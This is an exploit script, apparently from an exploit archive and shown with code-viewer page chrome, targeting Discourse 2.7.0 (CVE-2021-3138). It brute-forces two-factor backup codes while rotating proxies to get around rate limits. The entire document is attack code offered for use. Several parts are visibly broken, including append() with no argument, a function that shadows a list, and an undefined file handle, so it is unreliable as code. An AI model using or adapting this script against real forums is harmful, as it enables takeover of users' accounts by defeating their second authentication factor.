70 lines
No EOL
2.2 KiB
Python
Executable file
70 lines
No EOL
2.2 KiB
Python
Executable file
# Exploit Title: Discourse 2.7.0 - Rate Limit Bypass leads to 2FA Bypass
|
|
# Date: 14/01/2021
|
|
# Exploit Author: Mesh3l_911
|
|
# Vendor Homepage: https://www.discourse.org/
|
|
# Software Link:https://github.com/discourse/discourse
|
|
# Version: Discourse 2.7.0
|
|
# CVE: CVE-2021-3138
|
|
|
|
import requests
|
|
|
|
username = input("\n input ur username : ")
|
|
password = input("\n input ur password : ")
|
|
session=requests.session()
|
|
|
|
proxies = []
|
|
def proxies():
|
|
proxies_path = input("\n input ur proxies path : ")
|
|
|
|
with open(proxies_path, 'r') as prox:
|
|
for _ in prox.read().splitlines():
|
|
proxies.append()
|
|
|
|
backup_codes = []
|
|
def backup_list():
|
|
Backup_codes = input("\n input ur Backup_codes list path : ")
|
|
|
|
with open(Backup_codes, 'r') as codes:
|
|
for _ in codes.read().splitlines():
|
|
backup_codes.append()
|
|
|
|
def exploit():
|
|
with open('Backup_codes.txt', 'w') as results:
|
|
try:
|
|
for __ in proxies:
|
|
for _ in codes.read().splitlines():
|
|
header =\
|
|
{
|
|
"X-CSRF-Token": "ur X-CSRF-Token",
|
|
"Cookie": "ur Cookie",
|
|
"X-Requested-With": "XMLHttpRequest"
|
|
}
|
|
body = {"login": username, "password": password, "second_factor_token": _, "second_factor_method": "2"}
|
|
request = session.post("ur target_url", headers=header, data=body, proxies={'http': __, 'https':__})
|
|
source = request.text
|
|
backup_codes.remove(_)
|
|
|
|
if request.status_code == 200:
|
|
if '"id"' in source:
|
|
results.write("The Backup_Coude is > {} ".format(_))
|
|
return True
|
|
else:
|
|
pass
|
|
else:
|
|
proxies.remove(__)
|
|
break
|
|
|
|
|
|
except requests.exceptions.SSLError and requests.exceptions.ConnectionError:
|
|
print(" Connection Failed :( ")
|
|
|
|
results.close()
|
|
|
|
|
|
def main():
|
|
if exploit():
|
|
print("\n Found :) \n")
|
|
else:
|
|
print("\n Please re-check ur inputs :( \n")
|
|
if __name__ == '__main__':
|
|
main() |